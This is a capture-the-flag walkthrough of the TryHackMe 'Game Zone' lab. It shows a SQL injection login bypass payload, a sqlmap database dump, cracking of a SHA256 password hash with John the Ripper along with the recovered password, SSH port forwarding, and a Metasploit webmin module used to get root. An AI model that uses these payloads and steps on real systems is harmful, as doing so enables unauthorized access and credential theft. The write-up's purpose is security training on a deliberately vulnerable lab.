TryHackMe – Game Zone Walkthrough

TryHackMe - Game Zone Walkthrough

CHALLENGE OVERVIEW

• Link: https://tryhackme.com/room/gamezone
• Difficulty: Easy
• Target: user and root flags on a Linux server
• Highlights: leveraging port forwarding to expose a webservice from behind a firewall, using sqlmap to find a username and hashed password
• Tools used: sqlmap, nmap, dirb, burpsuite, hydra, john the ripper, metasploit
• Tags: sqli, hashcracking, metasploit, ssh tunnel

BACKGROUND

In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!

IPs

export targetIP=10.10.163.79
export myIP=10.6.2.23

ENUMERATION/RECON

Let’s kick things off with our standard nmap and dirb scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.

To find the character’s name on the main page, we can do a reverse image search on google. I’ve played this title before but forgot his name, so I just googled “hitman game character name” to find the answer to our first question. (agent 47)

NMAP SCAN RESULTS

DIRB SCAN RESULTS

WALK THE WEBSITE

We see a login portal on the landing page of our target IP. We also look at the /images folder that dirb found, but nothing remarkable is there at first glance.

Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:

' or 1=1 -- -

The login trick works, and we are presented with a search box.

INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP

Let’s fire up burpsuite now to intercept an HTTP-post request made with this search box.

Intercepted HTTP-post request:

POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close

searchitem=hitman

We’ll save this request in a file titled req.

If you use burpsuite to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the sqlmap command. 

USING SQLMAP TO EXTRACT THE FULL DATABASE 

With the following command, we can instruct sqlmap to attempt to download (dump) the entire database and search for login username and hashed password.

sqlmap -r req --dbms=mysql --dump --level 5

It worked! We see that the database stores a list of game titles and reviews.

The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.

+------------------------------------------------------------------+----------+
| pwd                                                          	| username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |

We can see that it is probably a SHA256 encrypted string. Now it’s time to …

CRACK THAT HASH WITH JOHN (THE RIPPER)!

john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256

rockyou.txt is a legendary leaked database of passwords (14,344,391 passwords!)

Output:

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124	(?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

SSH INTO THE BOX AND GRAB THE USER FLAG

ssh agent47@10.10.151.6

We are in!

agent47@gamezone:~$ cat user.txt
64—---digits omitted—--------5c

PRIVILEGE ESCALATION

This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener.

Let’s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.

agent47@gamezone:~$ ss -t -u -l -p -n

Output:

Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000            *:*

This first line is curious. It appears that a service is running on port 10000 of the target system.

Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.

SET UP PORT FORWARD WITH SSH

The following command will activate port forwarding via ssh:

ssh -L 10000:localhost:10000 agent47@10.10.151.64
password: —-cracked-password—-
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management: 	https://landscape.canonical.com
 * Support:    	https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$

We are connected now with port forwarding in place. Let’s navigate in our browser to http://$targetIP:10000

After logging in with the same username:password combination we used with ssh, we are given access to a webmin portal.

PRIVESC WITH METASPLOIT

Searching for webmin in Metasploit brings up the following Metasploit module.

Let’s use it and set it up with the following options:

Let it rip! 

run

And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.

sessions -i 0

And we now have our root flag! Thanks for reading this write-up.